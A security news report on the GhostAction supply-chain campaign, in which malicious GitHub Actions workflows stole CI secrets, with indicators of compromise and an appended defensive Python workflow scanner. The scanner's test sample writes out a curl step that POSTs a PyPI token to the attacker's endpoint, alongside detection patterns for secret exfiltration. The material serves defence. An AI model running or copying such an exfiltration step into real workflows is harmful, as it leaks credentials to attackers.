Security researchers have identified a significant attack campaign, termed GhostAction, which compromised the secrets of 327 GitHub users, affecting 817 repositories.
The attack was discovered through a malicious workflow in the FastUUID project.
GitGuardian detected a suspicious GitHub workflow commit titled “Add Github Actions Security workflow,” initiated by the account Grommash9 on Sat, Sep 2, 2025.
This workflow was designed to exfiltrate sensitive secrets, such as API tokens, to an attacker-controlled server.
FastUUID as the Entry Point
The malicious file extracted the PyPI API token from the repository’s environment variables, sending it to an external server.
No evidence of malicious releases was found during the compromise window, even though the stolen token would have allowed tampering with the FastUUID package on PyPI.
GitGuardian promptly alerted PyPI, which placed the project in read-only mode, and the compromised maintainer reversed the malicious commit.
The swift response minimized the impact on FastUUID and its dependent projects, such as BerriAI/litellm.
Further investigation revealed similar malicious commits across multiple repositories. Each targeted workflow attempted to exfiltrate various secrets, including GitHub tokens, DockerHub credentials, Cloudflare API tokens, and NPM access keys.
In total, 3,325 leaked secrets were identified across the campaign. Compromised NPM and PyPI tokens pose a significant supply chain security risk, potentially allowing attackers to publish malicious packages under trusted names.
The stolen data was consistently sent to the server at https://bold-dhawan.45-139-104-115.plesk.page, hosted under 493networking.cc. This infrastructure had stopped responding by the evening of Tue, Sep 5, 2025, possibly indicating that the attacker shut it down.
Of the 817 impacted repositories, the maintainers of 100 quickly reverted the malicious commit, and GitGuardian notified the maintainers of another 573.
Some repositories had been deleted or had issues disabled, which limited GitGuardian's ability to notify their maintainers.
Affected developers reported unauthorized use of AWS keys and database credentials. Several companies experienced portfolio-wide compromises across languages such as Python, Rust, JavaScript, and Go.
GitGuardian disclosed its findings to GitHub, PyPI, and NPM on Tue, Sep 5, 2025. At the time of writing, 9 NPM packages and 15 PyPI projects remain at risk of malicious updates published with the stolen tokens.
The GhostAction campaign is a significant compromise of the developer ecosystem, underscoring the need for monitoring workflows, securing CI/CD secrets, and rapid incident response.
Indicators of Compromise (IOCs)
Network Indicators:
- Malicious Endpoint: https://bold-dhawan.45-139-104-115.plesk.page
- IP Address: 45.139.104.115
- HTTP Method: POST requests with secret data
GitHub Workflow Indicators:
- Malicious Workflow Name: Github Actions Security
- File Path: .github/workflows/github_actions_security.yml
- Commit Messages: “Add Github Actions Security workflow”
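One way to turn these indicators into a repository check, as an added example that is not part of the original report: a dependency-free Python scanner over the contents of a workflow file. It matches the published workflow name and exfiltration endpoint, and additionally applies a generic heuristic that goes beyond the listed IOCs, flagging any step that both reads a ${{ secrets.* }} value and calls curl or wget against a host outside github.com. Both sample workflows and the secret name PYPI_API_TOKEN are constructed for the example.

```python
import re

# Indicators reported for GhostAction: the workflow name and the exfiltration endpoint.
KNOWN_WORKFLOW_NAME = "Github Actions Security"
KNOWN_ENDPOINTS = ("bold-dhawan.45-139-104-115.plesk.page", "45.139.104.115")

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.[A-Za-z0-9_]+\s*\}\}")
HTTP_CLIENT = re.compile(r"\b(curl|wget)\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")


def scan_workflow(text: str) -> list[str]:
    """Return findings for the contents of one .github/workflows/*.yml file."""
    findings = []
    m = re.search(r"^name:\s*(.+?)\s*$", text, re.MULTILINE)
    if m and m.group(1).strip("\"'") == KNOWN_WORKFLOW_NAME:
        findings.append(f"workflow name matches IOC: {KNOWN_WORKFLOW_NAME!r}")
    for endpoint in KNOWN_ENDPOINTS:
        if endpoint in text:
            findings.append(f"known exfiltration endpoint referenced: {endpoint}")
    # Generic heuristic (beyond the published IOCs): a step that both reads a
    # ${{ secrets.* }} value and runs curl/wget against a host outside github.com.
    # Splitting on "- " step markers stands in for a real YAML parser.
    for step in re.split(r"^\s*-\s", text, flags=re.MULTILINE)[1:]:
        if not (SECRET_REF.search(step) and HTTP_CLIENT.search(step)):
            continue
        hosts = [h for h in URL_HOST.findall(step) if not h.endswith("github.com")]
        if hosts:
            findings.append("step sends a secret to external host(s): " + ", ".join(hosts))
    return findings


# Constructed sample modelled on the reported workflow (not the actual file).
MALICIOUS_WORKFLOW = """\
name: Github Actions Security
on: [push]
jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - run: curl -X POST -d "token=$PYPI_TOKEN" https://bold-dhawan.45-139-104-115.plesk.page
        env:
          PYPI_TOKEN: ${{ secrets.PYPI_API_TOKEN }}
"""

# Constructed benign publish workflow: uses the same secret but never ships it off-platform.
BENIGN_WORKFLOW = """\
name: Publish
on: [release]
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: pypa/gh-action-pypi-publish@release/v1
        with:
          password: ${{ secrets.PYPI_API_TOKEN }}
"""
```

Running scan_workflow over every file under .github/workflows in each repository, and over the diff of any new workflow commit, gives a quick first pass; the heuristic will also surface legitimate uploads to non-GitHub hosts, which then need manual review.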